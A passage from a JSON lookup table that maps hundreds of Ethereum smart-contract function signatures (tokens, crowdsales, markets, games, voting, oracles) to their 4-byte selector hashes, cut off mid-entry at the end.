"getUltimateOutcomes(bytes)": "0x45ee49b9", "getShares(address,bytes,int256[])": "0x1397fdbd", "withdraw(bytes)": "0x0968f264", "setUltimateOutcome(bytes)": "0x8f6f988c", "voteForUltimateOutcome(bytes,uint16)": "0x41095b60", "challengeWinningOutcome(bytes,uint16)": "0x9ec32d45", "getOracleOutcomes(bytes,address[])": "0xbbd8b602", "getOutcome(bytes)": "0xea4ba8eb", "isOutcomeSet(bytes)": "0x3d69b403", "oracleOutcomes(bytes,address)": "0xdb5b4183", "shares(address,bytes,int256)": "0x5e58f141", "descriptionHashes(bytes)": "0x632f0ba6", "getEventData(bytes)": "0x43703b0e", "withdrawFees(bytes)": "0x9431f5f0", "getMinFunding()": "0xdf6c13c3", "sellShares(bytes,uint8,uint256,uint256)": "0x4401ff5c", "getMarket(bytes)": "0x55ba343f", "createMarket(bytes,uint256,uint256,address)": "0x86723215", "buyShares(bytes,uint8,uint256,uint256)": "0xef04fdb7", "getShareDistributionWithTimestamp(bytes)": "0xd0315658", "getShareDistribution(bytes)": "0xf7a0fa0a", "calcMarketFee(bytes,uint256)": "0x9948e493", "getMarketHashes(bytes)": "0x1c879c47", "getMarkets(bytes,address)": "0x45c41478", "shortSellShares(bytes,uint8,uint256,uint256)": "0x4b031d0f", "closeMarket(bytes)": "0x46a1d95f", "calcEarningsSelling(bytes,uint256,uint256[],uint8,uint256)": "0x532e7e6a", "calcCostsBuying(bytes,uint256,uint256[],uint8,uint256)": "0x5323c6cf", "Send()": "0x92d282c1", "send()": "0xb46300ec", "getStatus(address)": "0x30ccebb5", "updateStatus(string)": "0x2c215998", "tokenSplit(address,address,address,uint256)": "0x9f5f7c7f", "etherSplit(address,address)": "0xc42cd8cf", "ReplayProtection()": "0x1df47aad", "bid(uint256,uint256,uint256)": "0x2ac9bf09", "claim(uint256)": "0x379607f5", "bid(uint256,uint256)": "0x598647f8", "buy(uint256,uint256)": "0xd6febde8", "safeMul(uint256,uint256)": "0xd05c78da", "getOwner(uint256)": "0xc41a360a", "isActive(uint256)": "0x82afd23b", "transferIfNoHF(address)": "0xc3b8bfe5", "transferIfHF(address)": "0x8cdfb1e6", "isHF()": "0xce8b7151", "dao()": "0x4162169f", "checkBothNotNull()": "0x452d44dc", "AmIPlayer2()": "0x805210b7", "AmIPlayer1()": "0x79b0797c", "getMyBalance()": "0x4c738909", "play(string)": "0x718e6302", "getWinner()": "0x8e7ea5b2", "rps()": "0x92b4bb50", "issuePOIs()": "0x96ed10a4", "submitVerifiedUsers(address[])": "0xfc89aff6", "bootUpHangouts()": "0x34e8980f", "fundUser(address,uint256)": "0x4e23a144", "isActive(address)": "0x9f8a13d7", "getHangoutAddress()": "0xc3d345c4", "consultBalance(address)": "0x2090cf8b", "_owns(address,address,uint256)": "0x62e5b1f2", "_isAuctionExist(uint256)": "0x96642cfc", "cancelAuctionEmergency(uint256)": "0xa42214b2", "PresaleMarket(address)": "0x2f39f5cd", "auctionsRunByUser(address,address)": "0x01c6f167", "random256()": "0x9a628121", "OwnableSimple()": "0x69428d97", "Ignite()": "0xb66ce7cc", "EUEBToken()": "0x4a18c25e", "EthereumPrivate()": "0x159e1e14", "LIFECOIN()": "0xccaa5135", "ATP(address,address)": "0x680c26bc", "CioCoinERC26Token(uint256,string,string,uint256)": "0xac6ebb28", "numPayTables()": "0xed9980a6", "curPayTableId()": "0x854b1cdf", "totalCredits()": "0xb5bd3eb9", "curUserId()": "0x19eb691a", "curId()": "0x5b40a584", "getDHandRank(uint32)": "0x13ca1464", "getDHand(uint32)": "0x2500ec4a", "getIHand(uint32)": "0x3fea1c2b", "getCurPayTable()": "0x8020fb77", "getPayTable(uint16)": "0xf3f31853", "_createNewGame(uint64)": "0x61494714", "_uncreditUser(address,uint256)": "0xc1499199", "_creditUser(address,uint256,uint32)": "0xee77cc51", "_addPayTable(uint16,uint16,uint16,uint16,uint16,uint16,uint16,uint16,uint16)": "0x2c92c071", "_finalizeFailure(uint32,string)": "0xe9c9f4e0", "finalize(uint32,bytes32)": "0xacca92e0", "_drawFailure(uint32,uint8,string)": "0x9fdd32cd", "draw(uint32,uint8,bytes32)": "0xcc691763", "_betFailure(string,uint256,bool)": "0xac6456df", "betFromGame(uint32,bytes32)": "0x609f9a8e", "betWithCredits(uint64)": "0x96fd550a", "addCredits()": "0x3f073031", "addPayTable(uint16,uint16,uint16,uint16,uint16,uint16,uint16,uint16,uint16)": "0xc6699ba8", "changeSettings(uint64,uint64,uint8)": "0xb41a6ce2", "getCardsFromHash(uint256,uint256,uint256)": "0x5208a157", "handToBitmap(uint32)": "0xbac18f9a", "readFromCards(uint256,uint256)": "0xf16787bc", "handToCards(uint32)": "0xa3293c0e", "getHandRank(uint32)": "0x7280850e", "drawToHand(uint256,uint32,uint256)": "0xd5420df4", "getHand(uint256)": "0xd47f269e", "CitizenOne(uint256,address,uint256)": "0x7d3d220d", "pushCap(uint256)": "0x6448b46f", "CitizenOneCoin(uint256)": "0x0b684de6", "SiliconValleyCoin()": "0xd710999d", "Duckcoin()": "0xb20debeb", "FinalizableToken(string,string,uint8,uint256)": "0xf8c46eff", "Finalizable()": "0xb64bbd9e", "buyPotato(uint256)": "0x84cbc92f", "CEO_Trader()": "0xf2d6cd26", "LamboToken(uint256,string,uint8,string)": "0x371115d1", "ByThePeople(address)": "0x3f9945d2", "changeArtUrl(string)": "0x7a3d2e5c", "changeArtName(string,string)": "0x79c20b41", "changeExplain(string)": "0xcfebc813", "BRM()": "0xbfb77030", "ClickRUB(uint256,string,string)": "0x1e22ffa5", "viewTokensRemaining()": "0x86d4fe9c", "viewTokensSold()": "0x67c51be7", "viewCurrentPrice()": "0x41dfed3a", "TokenSale(uint256)": "0x2827d4ca", "SpaceXToken()": "0x5ea95215", "getDragonPriceNo(uint256)": "0x21a83738", "buyAnotherDrangon()": "0xaea6e1a4", "getMyAnotherDragon()": "0xd1c5e119", "withDrawMoney(uint256)": "0x827cc452", "SCLToken()": "0x0c16683e", "SchmeckleToken()": "0x61a1d8fa", "ReBornEnergyCoin(uint256,string,uint8,string)": "0x4ca40518", "preICOregulations()": "0x131be36c", "refundTRA()": "0x6f766f20", "finalizebackup()": "0xf559417c", "turnmigrate()": "0x8e49a2c2", "turnrefund()": "0xcaecc5aa", "Partial23Send()": "0xc4a2c6b4", "Partial23Transfer()": "0x8d45e221", "createHNtokens(address)": "0xae06494e", "HonestisNetworkETHpreICO()": "0xf9b16430", "Mether()": "0x12a1c2f2", "PTSDToken(uint256,string,uint8,string)": "0xb3c63629", "FixBet31()": "0x322062b8", "LennartCoin()": "0x135da767", "endCrowdFund()": "0xcb27f28a", "changeFounderWalletAddress(address)": "0xd83a223a", "EPTCrowdfund(address,address,uint256)": "0x98ce476a", "EPTToken(address,address)": "0x8efe8c1c", "add_bonus(uint256)": "0xc1691fc3", "transferby(address,address,uint256)": "0xeb9763ed", "check_array_add(address)": "0x25d3b2c6", "rewarded_refresh()": "0x61296540", "getarray_length()": "0x322b1bc0", "gettotal_Supply()": "0xede42186", "end_crowdsale()": "0xf990b73b", "SolomexCrowdSale()": "0x278f05ba", "getIsEnabled(uint256)": "0x331670c5", "getGame(uint256)": "0xa2f77bcc", "recentlyEndedGames(uint256)": "0xfd4ad523", "SDTToken(uint256,string,string)": "0xa68c5ca1", "airdropTotalCurrent()": "0xf6d89563", "TheTokenE()": "0xc8e8d6d6", "ULTRIXCOIN()": "0x9dc371bd", "whoIsOwner()": "0x9ee1bd0f", "TheTokenA()": "0x1bd3553e", "wercoin()": "0x4bab0236", "SOLUSToken()": "0x962c9898", "KrisTest()": "0x882a1dee", "Sacacoin()": "0x99671dfb", "getActualNum(uint256)": "0x6c698882", "getReturnValue(uint256)": "0x69e91994", "ForTester()": "0x74cad0b7", "qwecoin()": "0x18b3cd45", "getCEdetails(bytes32)": "0xee11ab9d", "getNumberOfCE()": "0xf66d0076", "getBanque()": "0xd5c999f8", "getNotaire()": "0xdfeb1719", "showContractBalance()": "0x901c947f", "showReportForDevice(uint16)": "0xf1751688", "showReportForMonth(uint16,uint8)": "0x4328894f", "withdrawFunds(uint16)": "0x4bc70b1e", "report(uint16,uint16)": "0x91dfa960", "addToken(uint256)": "0x179d375c", "transferFromRoot(address,address,uint256)": "0x4f232f77", "AngelCoin()": "0xa7d2d2ab", "ftechiz()": "0x4f74d4f6", "getInvestorDetails(address)": "0xefab1e50", "investor(address,uint256,uint256)": "0xb5eacc01", "enableInvestorTransfer(address)": "0x9ce04e35", "YTCOMMUNITY()": "0x3e254a0c", "createLastWill(address,string,string,string,uint256,uint256)": "0xca68a45d", "getWitnessWeiCost()": "0xbda8bf45", "getCreationWeiCost()": "0x3f5d0203", "MyWill(address,string,string,string,address,uint256,uint256)": "0xdd15b66c", "_setBalance(address,uint256,uint256)": "0x7eae6759", "askPrice(address)": "0x5905e1c5", "transferTokens(uint256,address[],address)": "0x39d00f12", "ABRATOKEN()": "0x5df3bdb9", "balanceAddress(address,address)": "0xea8269f4", "balanceSender(address)": "0x8362f6eb", "balanceThis(address)": "0x4f0cae88", "ReleasableToken(string,uint256,string,uint256)": "0x9d6e4eaa", "vote(string,uint8)": "0x90ca27f3", "setHashToFalse(bytes32)": "0x69a0188a", "_vote(bytes32,uint8)": "0x047f993d", "toSHA256(string)": "0x0178090c", "isHashValid(bytes32)": "0xef5d5331", "addAllValidShaHashes()": "0xea6f7f3e", "TESTToken()": "0xd598aef8", "EnigmaToken()": "0x887263cf", "setRateAgain()": "0xa760d1d0", "bonusRateOneEth()": "0x57292af8", "stopTokenTransfer()": "0xb49d3a53", "CGC()": "0xb3ff0065", "createtoken(string,string,uint256,address,address)": "0x7ce84784", "abToken()": "0x2c321ea1", "updateName(address,string)": "0xb9308d9e", "updateTrustScoreInBulk(address[],uint256[],uint256[])": "0xf04bf0c5", "updateTrustScore(address,uint256,uint256)": "0x8a49a3cc", "updateReputationScoreInBulk(address[],uint256[])": "0x6c7521cb", "updateReputationScore(address,uint256)": "0x8e4f9606", "updateStarScoreInBulk(address[],uint256[])": "0x8dfd1242", "updateStarScore(address,uint256)": "0x86ce8327", "registerUser(address,string,uint256,uint256)": "0x3b89be73", "isReleaseRecordExist(uint256)": "0x1cfa42d0", "PeerWalletsToken()": "0x864f4e54", "test3(address[5],uint256[5],uint8,bytes32,bytes32)": "0xbad09457", "test2(address[5],uint256[5])": "0x27c5cdea", "test(address[5])": "0x67a2534b", "setSecondTime(uint256)": "0x5bda8fa4", "setFirstTime(uint256)": "0xf1e02620", "updateMember(address,address,uint256,uint256,string,uint256)": "0x708bf79a", "Sell_Offer(uint256,uint256,uint256)": "0xbefaed75", "Buy_Offer(uint256,uint256,uint256)": "0x74c65206", "memberShare(uint256)": "0xea84a6cd", "book(address,address,uint256,uint256)": "0xb9a527b4", "tokenFallback(address,address,uint256,bytes,string,uint256)": "0x9bd1ff8b", "AssetContract()": "0xca154008", "createTransaction(address,address,uint256,string,uint256,uint256)": "0x6f8b7574", "acceptOffer(string)": "0x14bd3d87", "SellOffer(address,address,uint256,uint256,uint256,uint256)": "0xce744ba5", "cancelOffer()": "0x62d05c78", "acceptOffer(uint256,string)": "0x444115f6", "BuyOffer(address,address,uint256,uint256,uint256,uint256)": "0xdefc8ae9", "checkAddress(address,address)": "0xad49f595", "treasurer()": "0xfda49eb4", "newReadAddr()": "0x5eebc031", "newWriteAddr()": "0xa7a7be1a", "readAddr()": "0x942d73b1", "writeAddr()": "0x32033229", "OLOVE(uint256,string,string)": "0x52613423", "viewCertificateByCourse(address,string)": "0x9e41a9cd", "viewAllCertificate(address)": "0x56d9bb9a", "assignCertificate(address,string,string,string,string)": "0x66e1aa99", "setTotalTokenSupply(uint256)": "0x7c8f8278", "setTgeAsSaleAgent()": "0xca30a279", "deleteAddressesFromWhitelist(address[])": "0x402962bc", "retrieveExternalTokens(address,address)": "0x1b987c41", "calculateAndMintTokens(address,uint256)": "0x9d189473", "canExitPool(address)": "0xb010d94a", "canExitPool()": "0x5a5383ac", "enterPool(address)": "0xffd10e07", "enterPool()": "0x50a3bd39", "canEnterPool(address)": "0x8dd5e298", "canEnterPool()": "0xc630f92b", "getPoolRotationDelay()": "0xed2b8e0b", "getPoolFreezePeriod()": "0x61649472", "getPoolOverlapSize()": "0xc831391d", "getPoolId()": "0x38fff2d0", "getGenerationMemberLength(uint256)": "0x67854643", "getGenerationEndAt(uint256)": "0x306b031d", "getGenerationStartAt(uint256)": "0xf8b11853", "addAddressToGeneration(address,uint256)": "0x0bebd0f9", "createNextGeneration()": "0xf59f99ee", "ResourcePoolTester()": "0xb7c93330", "setMinimumPassPercentage(uint8)": "0x00e46700", "setMinimumDebatePeriod(uint256)": "0xa140e79c", "setMinimumQuorum(uint256)": "0x6f698fb5", "ExecutableBase()": "0xb36df681", "Proxy()": "0xfd782de5", "__forward(address,uint256,uint256,bytes)": "0x567dbf18", "____forward(address,uint256,uint256,bytes)": "0x96c52fc3", "deployContract(address)": "0xa4898fd5", "ShareholderDB(uint256)": "0x4d47feaa", "allocateShares(address,uint256)": "0x8e2a6470", "removeShareholder(address)": "0x9babdad6", "addShareholder(address)": "0xdb29fe12", "queryShareholders(bytes,uint256)": "0xc45aa04c", "getPreviousShareholder(address)": "0xb722a9ef", "getNextShareholder(address)": "0xa200dc73", "getJoinBlock(address)": "0x08933d11", "isShareholder(address)": "0xb89a73cb", "processDividends(address)": "0x7f480f9d", "processNextDeposit(address)": "0xe7334156", "processDividends(address,uint256)": "0x57f4d5ec", "hasUnprocessedDividends(address)": "0x5437b39b", "recordBalance(address)": "0x311d5a2a", "deposit(uint256)": "0xb6b55f25", "numDeposits()": "0xbbd4e8c9", "dividendBalance(address)": "0xa0afd731", "historyIdx(address)": "0xb9f28076", "depositIdx(address)": "0x9a97043b", "balances(address,uint256)": "0xcbf1304d", "numBalanceRecords(address)": "0x3397ca17", "balanceAt(address,uint256)": "0x3b8e6f2e", "withdrawFrom(address,address,uint256)": "0x9555a942", "deposit(address)": "0xf340fa01", "setOwner(address,address)": "0x299a7bcc", "getShareholderDB()": "0x13827950", "setToken(address)": "0x144fa6d7", "__proxy_motion(address,uint256,uint256,bytes)": "0x611f69de", "setMotionDB(address)": "0x62e05175", "setDividendDB(address)": "0x8f99ea43", "setShareholderDB(address)": "0x68f5aa0f", "setValidator(address)": "0x1327d3d8", "setFactory(address)": "0x5bb47808", "validate(address)": "0x207c64fb", "create()": "0xefc81a8c", "exists(address)": "0xf6a3d24e", "remove(address)": "0x29092d0e", "add(address)": "0x0a3b0a4f", "buildContract(address)": "0x6ad2a0b3", "MotionFactory(string,string,string)": "0xcc2c2bcf", "Motion(address)": "0xcabd27de", "continueExecution()": "0x8124bb0f", "beginExecution()": "0xbc5d0f65", "tallyVotes()": "0x378a2178", "closeVoting()": "0xc631b292", "reject()": "0x4dc415de", "accept()": "0x2852b71c", "configure(uint256,uint256,uint8,address)": "0xa553a597", "vote(bytes)": "0xe9dc0614", "submitCanonicalCandidate(bytes,bytes,bytes,bytes)": "0x27bc39c0", "requestCanonicalFormat(bytes)": "0x70b1d9d4", "getCandidateKey(bytes,bytes,bytes,bytes)": "0xd98d011d", "lookupISO3116_1_alpha_3(bytes)": "0xfa68b4ce", "lookupISO3116_1_alpha_2(bytes)": "0x50ea1932", "lookupCanonicalFormat(bytes)": "0x9ee035c9", "getRecordKey(bytes,bytes,bytes)": "0x8e52cb51", "recordExists(bytes)": "0xd2fb8787", "getTotalAvailableRelays()": "0x5714f6a1", "initiateVerification(address,bytes,bytes)": "0x8e2c6f4d", "getVerificationId(address,bytes,bytes)": "0xf1076703", "getMinimumConsumerDeposit()": "0x25495998", "__throw()": "0xe1041d86", "addHash(bytes)": "0x54ed7b6e", "getHash(bytes)": "0xb00140aa", "hasHash()": "0x6edbd134", "Relay(address)": "0x943a32bc", "USD()": "0x1bf6c21b", "WEI()": "0xb845c9a2", "oneCentOfWei()": "0x531b97d7", "getPriceProxy()": "0x104d5fdd", "USDOracle()": "0x3ae01f84", "setUUID4Bytes(bytes)": "0xd69450d5", "UUID4()": "0x352d2790", "collisionCount()": "0x31757f2e", "getEntropy()": "0x5404bbf7", "addEntropy()": "0x4b0bbf84", "assetInfo(uint256)": "0xa879fcbb", "_applyCommission(uint256)": "0xbb81926d", "reverseFiatPurchase(uint256)": "0x7e38b424", "purchaseWithFiat(uint256)": "0x18714bc8", "purchaseWithEther(uint256)": "0xf4ce7c1c", "getCommissionForType(string)": "0xafe70413", "updateCommission(string,uint8,uint8)": "0xc3b7572c", "_approvePurchaser(address,uint256)": "0xd20db416", "setPriceInWei(uint256,uint256)": "0x7e298249", "_populateTokenData(uint256,bytes16,uint256,uint32)": "0xec0493f7", "mint(string,bytes16,uint256,uint32,address)": "0xe6153d1b", "KnownOriginDigitalAsset(address)": "0x6ee1844e", "bytes16ToStr(bytes16,bytes16,uint8,uint8)": "0x0c1e517f", "betContractUP()": "0xb1cb4217", "HALAL()": "0x0c8367fb", "Caps()": "0x54114dee", "getWallet()": "0x13299604", "rateUpgrade(uint256)": "0x63443679", "WinkSale(uint256,uint256,uint256,address)": "0x76ac2323", "POOL_EDIT_4()": "0x0d4d389f", "VisualChainToken()": "0xd5670f59", "ExtremeCoin()": "0x2481325a", "WorkerToken(uint256,string,uint8,string)": "0x676d20ba", "Henfruit()": "0xb23a0b90", "ZAMZA()": "0xbe60e771", "autoFinishTime()": "0x9a722769", "manualFinish()": "0x0dda507e", "robotRefund(address)": "0x0dbea6d0", "generateTeamTokens()": "0x8c30079a", "finishICO(bool)": "0xffad75eb", "successICO()": "0x59ec29fe", "addToStat(uint256,uint256)": "0x3ed03798", "calculateForValue(uint256)": "0x5cfc53c1", "manageStatus()": "0x60f8e036", "isReachedLimit()": "0x66de6fa4", "S25ICO()": "0xa9c4d62e", "allowTokenOperations(address)": "0x48c9ecf8", "unblock()": "0x9cbdffc6", "CharityToken()": "0x3fbda23f", "ALDToken(uint256,string,uint8,string)": "0xba6ca603", "setTymTokensWallet(address)": "0x53613273", "setTymTokensPercent(uint256)": "0x6c5d2787", "createAuction(uint256,uint256,uint64,uint256)": "0x279b4e76", "registerAsSeller(address,string,string,string,string)": "0x9fb5bdb9", "TimeBroker()": "0xd9b5618c", "changeStartPrice(uint256)": "0xd11cd4c6", "LowRiskBag()": "0x1556195c", "WHUToken()": "0x8683e4b4", "CrowdsaleContract(uint256,uint256,address,uint256,uint256)": "0x0cd205bb", "transferAnyTokens(address,address,uint256)": "0x0c8ac6f7", "depositCPT(address,uint256,bytes32)": "0x3bc764f7", "setTokenPriceInWei(uint256)": "0xb597e784", "BuyToken()": "0x41852eb2", "WithdrawToken(uint256)": "0xa4b910fb", "GetToken(address,uint256)": "0x5a703223", "BATSafe(address)": "0x74019f87", "MatryxToken()": "0xac155a6c", "SmartContractCasino()": "0x23c2de55", "FaradCryptoken()": "0xf770a865", "IOVOToken()": "0x0aafa40e", "MucToken()": "0x80c810d5", "pharmatrix(uint256)": "0x91eb97ea", "withdrawCommission(uint256)": "0x17face84", "calcCommission(uint256)": "0x3a6e3d98", "changeCommission(uint256)": "0xdf922f3a", "auditContract(bytes32,bool)": "0x02eba8a7", "withdrawRequest(address,bytes32)": "0xea212b1e", "requestAudit(address,bytes32,uint256)": "0x9bf1f148", "endAirdrop()": "0x726b5bad", "withdrawAirdropTokens()": "0x04903592", "airdropRecipientCount()": "0xe9171abb", "FactoringChain(address)": "0x875e7bb4", "DGCASH()": "0xa6eaab99", "emergencySelfDestruct()": "0xf4463fb7", "isAvailable()": "0x856c71dd", "getCompetitionInfo(uint256)": "0x1864db71", "getTeam(address)": "0x87529f0f", "_insertSortMemory(uint32[11])": "0x6bb60475", "_getWinCountWeight(uint256)": "0x624aba21", "cancelCompetition(uint256)": "0xe9360096", "competition(uint256)": "0x7747c993", "reward(uint256,uint256)": "0xa4fa8d57", "sponsor(address,uint256,uint256,uint256)": "0xcda2695a", "start(uint8)": "0xd2ab6be1", "_getWeight(uint256)": "0x802eb89c", "_calTeamAttribute(uint8,uint8,uint8,uint32[11])": "0x719f2fb7", "getTeamAttribute(uint8,uint8,uint8,uint32[11])": "0x24a23361", "cancelAllEnter()": "0x6bc2805d", "cancelEnter(address)": "0x3965e75d", "enter(address,uint256,uint8,uint8,uint8,uint32[11])": "0xd41b6853", "getOperationCost(uint256)": "0x38721fa4", "setOperatingCost(uint32[5])": "0xa53a4747", "setMinEnterFee(uint256)": "0xf0bf4df4", "TournamentCore(address,address,address,address)": "0xa68a2884", "_onOverTimeBall(uint8,uint8,uint8,uint8,uint8[3][3][31])": "0xc4e1793f", "_onBall(uint8,uint8,uint8,uint8,uint8[3][3][31])": "0xf97c72b1", "_getSkillConfigs()": "0x4aa3fcd3", "triggerSkill(uint32[11][32],uint8[32],uint8[4][31],uint8[3][3][31],uint8[5][11][32],uint16[11][32],uint32[3][11][32])": "0x55d1f799", "_getSkill(uint16)": "0x103ed140", "randomNext(uint256,uint256)": "0x30abac7b", "AdminGroup(string)": "0xc7f7475c", "checkIdentifier(string)": "0xdc199335", "getSignatureHash()": "0xc127ae41", "get(string,int256)": "0xbee98dff", "removeToken(string,int256)": "0x852ede8d", "addToken(string,int256,bytes)": "0x700f3a1d", "Identity(address,address)": "0xff84ed36", "SimpleWallet()": "0x4aabcec7", "StairStepDecayingTokenFunction()": "0xa5313069", "emergency()": "0xcaa6fea4", "Change_approvePay(address,bool)": "0xb13170d6", "Remove_member(address,address)": "0x81d38ada", "searchInList(address)": "0xdf4bef32", "Addmember(string,address,address,uint256,bool,uint256,bool)": "0xc3800257", "Stakeholder()": "0xaac5ce9a", "executeGameProposal(uint256,bytes)": "0x2d646742", "proposeGame(string,string,uint256,bytes)": "0x63d1055c", "Games(uint256,uint256)": "0xd5edca54", "getSellOrdersInfo()": "0x65ac8c2a", "getBuyOrdersInfo()": "0x27164f15", "getSellOrder(uint80)": "0x3185a61e", "getBuyOrder(uint80)": "0x77703d29", "testTransferVotes()": "0x0048d680", "testGetResults()": "0xd0e33b1b", "testCastVote()": "0xb68e7f6e", "testNonExistingVoteWeight()": "0xca1c3bb3", "testExistingVoteWeight()": "0x9ee61c9d", "testCreateElectionOptions()": "0x48b84cde", "testCreateElection()": "0x91ac2c3f", "testMsgSenderInVoters()": "0xc858c017", "FooContract(address)": "0x56aa3892", "cancelAgreement(uint256)": "0x5686b54b", "revokeSignToCancelAgreement(uint256)": "0x89d75221", "signToCancelAgreement(uint256)": "0x8b087f3f", "VestingScheme()": "0x7d97b1f6", "approveOwnership()": "0x742c81e4", "SafeOwnable()": "0x3b784e9e", "transferTokens(address,uint256)": "0xbec3fa17", "setOwnership(address)": "0xa7016023", "SingularityNetToken()": "0xe8b9d536", "overloadedMethod(address,uint256,string)": "0xea780bf2", "overloadedMethod(address,uint256)": "0x9498bef5", "overloadedMethod(address)": "0x6efab8f2", "failExecute()": "0x682d1138", "Quotation(uint256,string)": "0x39e46ebe", "finalizeProposal()": "0xc4dc1556", "BasicSprout()": "0x7cf6babf", "rmAsset(address)": "0x45bbee71", "addAsset(string,address)": "0xadc02a64", "setValidity(uint256)": "0xdea1bd69", "setFrequency(uint256)": "0xf426f03a", "updatePriceOraclize()": "0x2c960569", "setGasLimit(uint256)": "0xee7d72b4", "disableContinuousDelivery()": "0x4da5ed85", "enableContinuousDelivery()": "0x9cf4124f", "updateKey(bytes)": "0xe6eb6867", "setQuery(string)": "0x9e8110e6", "setPriceOf(string,string,address)": "0xc53bafbb", "nativeProof_verify(string,bytes,bytes)": "0x7ed06cf3", "isFresh(string)": "0xe644f60b", "CryptoCompare()": "0x5c27bbf6", "getData(address)": "0x38266b22", "getFrequency()": "0x0a42f86f", "b64decode(bytes)": "0xa950fb0e", "JSONpath_int(int256,string,string,uint256)": "0x7d7ca00c", "JSONpath_string(string,string,string)": "0x105e029f", "JSONpath_raw(string,string)": "0xd55cc3e2", "parseDate(string)": "0x0c03f24a", "toMonth(string)": "0x9e976d38", "claimItems(uint256,uint256)": "0x9b2e5d32", "claimSolve(uint256[],uint256,uint256,bool)": "0x829c38e1", "claimBond(uint256)": "0x1c08c08e", "proposeSolve(uint256,uint256)": "0xc1bd3685", "enter(uint256,uint256,uint256)": "0xbc208057", "newContest(uint32,uint256,uint256,uint32,uint256,uint32)": "0x78d9c387", "FAMEToken()": "0x631d551b", "test_ConsensysNotReached()": "0xc50886ae", "test_ConsensysReached()": "0x1f04b54c", "memberInfo(address)": "0xa313c371", "memberLevel(address)": "0x1ed454a5", "setMemberInfo(address,bytes32)": "0x3a6ab569", "SpiceMembers()": "0x874752b4", "getAddressUInt8(bytes32,bytes32)": "0xe33e5c5e", "setAddressUInt8(bytes32,bytes32,address,uint8)": "0x2bc40f9a", "getBytes32(bytes32,bytes32)": "0x37d9d7fc", "setBytes32(bytes32,bytes32,bytes32)": "0xa14ff857", "getUInt8(bytes32,bytes32)": "0x428e357b", "setUInt8(bytes32,bytes32,uint8)": "0x252edb76", "getInt(bytes32,bytes32)": "0xa6fbf3d2", "setInt(bytes32,bytes32,int256)": "0x061c8800", "USN(address,address,bytes32,uint256,uint256,uint128)": "0x8c37edc4", "getCommitment(bytes32)": "0x7795820c", "getMyCommitmentHash(uint256)": "0xf0437a36", "getMyCommitmentCount()": "0x8337680a", "settle(bytes32,bytes32,uint8,bytes32,bytes32)": "0x1f63a350", "makeCommitment(uint256,bytes32,address,address)": "0xe9f2dbfb", "SimpleOwnedStorage(string)": "0xe9b85cf4", "withdrawBidForStar(uint256)": "0x2d2f7e4d", "acceptBidForStar(uint256,uint256)": "0xa2008eb9", "enterBidForStar(uint256)": "0xb7232cd9", "getLocation(address)": "0xd9e0dc59", "isCompromised(address)": "0x3ebc2ab3", "updateLocation(string)": "0x932354c1", "LeviathanToken()": "0x37a7095b", "customerExchangeEther(uint256,address,string)": "0xcc3a0c8d", "customerExchangeFiat(uint256,address,string)": "0x772a3835", "Bank(string)": "0xd45c1b06", "recordMoment(address,uint256,uint256)": "0xd68f30a7", "clearWalletPending()": "0x2fa6512f", "calcMerkleDefault(bytes32[],uint256,uint256,bytes32)": "0xd8692f17", "fileMerkle(bytes32[],uint256,uint256)": "0x5dcf1b77", "calcMerkle(bytes32[],uint256,uint256)": "0x7ccaa9fa", "getCodeAtAddress(address)": "0xc7a2a663", "getFiles(bytes32)": "0xa22b5a1c", "getIPFSCode(bytes32)": "0x64341c0c", "getCode(bytes32)": "0xe8fe6b66", "addToBundle(bytes32,bytes32)": "0xf4246be4", "makeBundle(uint256)": "0xc2eb10a2", "debug_finalizeBundleIPFS(bytes32,string,bytes32)": "0xa4c089be", "finalizeBundleIPFS(bytes32,string,bytes32)": "0x5308db4b", "getLeaf(bytes32,uint256)": "0x8ec9a5de", "getData(bytes32)": "0x54f6127f", "setByteSize(bytes32,uint256)": "0x9ef5233f", "getByteSize(bytes32)": "0xafcac546", "getName(bytes32)": "0x54b8d5e3", "addIPFSFile(string,uint256,string,bytes32,uint256)": "0x57e7afd0", "calcId(uint256)": "0xe4bd9ebd", "Filesystem()": "0x55aa8ad4", "consume(bytes32,bytes32[])": "0x7d436d76", "SampleContractOther()": "0xbf6b6536", "testReceiveSubmittal()": "0x9c92bfda", "testReceiveHash()": "0xaf80562c", "testSubmitHash()": "0xbd22f1cd", "setWriteTimestamp(bytes32,uint256)": "0xf0006707", "getTmpWriteTimestamp(bytes32)": "0xf80dfdc2", "setTmpWriteTimestamp(bytes32,uint256)": "0xedd3def5", "SetNumber(uint64)": "0x2371bb4b", "GetNumber()": "0x06a5312b", "Pay()": "0x537a924c", "Buy(uint64)": "0x24888154", "getHyper(address)": "0x464cecb8", "getPartners(address,uint256)": "0x9bbdb25a", "hyperInterface()": "0x20675504", "Lesson_4(address,uint256)": "0x63cc23ae", "setMesa(uint256)": "0xf07819a3", "setEscuela(uint256)": "0x765bfac6", "setDistrito(uint256)": "0xdc94e45d", "setCategory(uint256)": "0xe5d2ce2f", "setCategoryVerify(uint256)": "0x28148d07", "isFiscal()": "0xe50dd478", "isPresidenteDeMesa()": "0x46226514", "isAutoridadElectoral()": "0x7bc6a02e", "logout()": "0x1f3c99c3", "login(bytes32)": "0x879281c4", "loginVerify(bytes32)": "0x94df682d", "getUser()": "0x832880e7", "User(bytes32,bytes32,uint256)": "0x3962d9f1", "Arrays()": "0x51e00935", "RBACWithAdmin()": "0xbadbbf34", "getAppBase(bytes32)": "0xda5a9366", "revokeUserRole(bytes32,string,address)": "0xc2a48c70", "grantUserRole(bytes32,string,address)": "0x2f677038", "removeContractRole(bytes32,string)": "0xedd70a75", "addContractRole(bytes32,string)": "0x644443ed", "Roles()": "0x5747baf5", "setRolesContract(address)": "0xafa202ac", "senderHasRole(string)": "0x1ca03b8e", "hasRole(string)": "0xe3c33a9b", "SecuredWithRoles(string,address)": "0x40496aef", "confirmGameEnded(bytes32)": "0x95c0c3f6", "claimTimeoutEnded(bytes32)": "0x996301e4", "claimTimeoutEndedWithMove(bytes32,uint256,uint256)": "0xb8ab9883", "claimWin(bytes32)": "0x0b5faf97", "surrender(bytes32)": "0xaec1914d", "getWhitePlayer(bytes32)": "0xaf9c5e7a", "getCurrentGameState(bytes32)": "0x6f9b0b7d", "setGameState(bytes32,int8[128],address)": "0x7e84adda", "move(bytes32,uint256,uint256)": "0x9e7d24df", "moveFromState(bytes32,int8[128],uint256,uint256,bytes)": "0x6e939d05", "joinGame(bytes32,string)": "0xe6378d3a", "initGame(string,bool,uint256)": "0x6ea6d76d", "Chess(bool)": "0x89f88d7a", "getEloScore(address)": "0x54c91295", "fetchValue()": "0x878170d1", "decrementValue()": "0x16b78191", "incrementValue()": "0x3bfd7fd3", "cashout(uint256)": "0xa9e732bb", "setCoinPrice(uint256)": 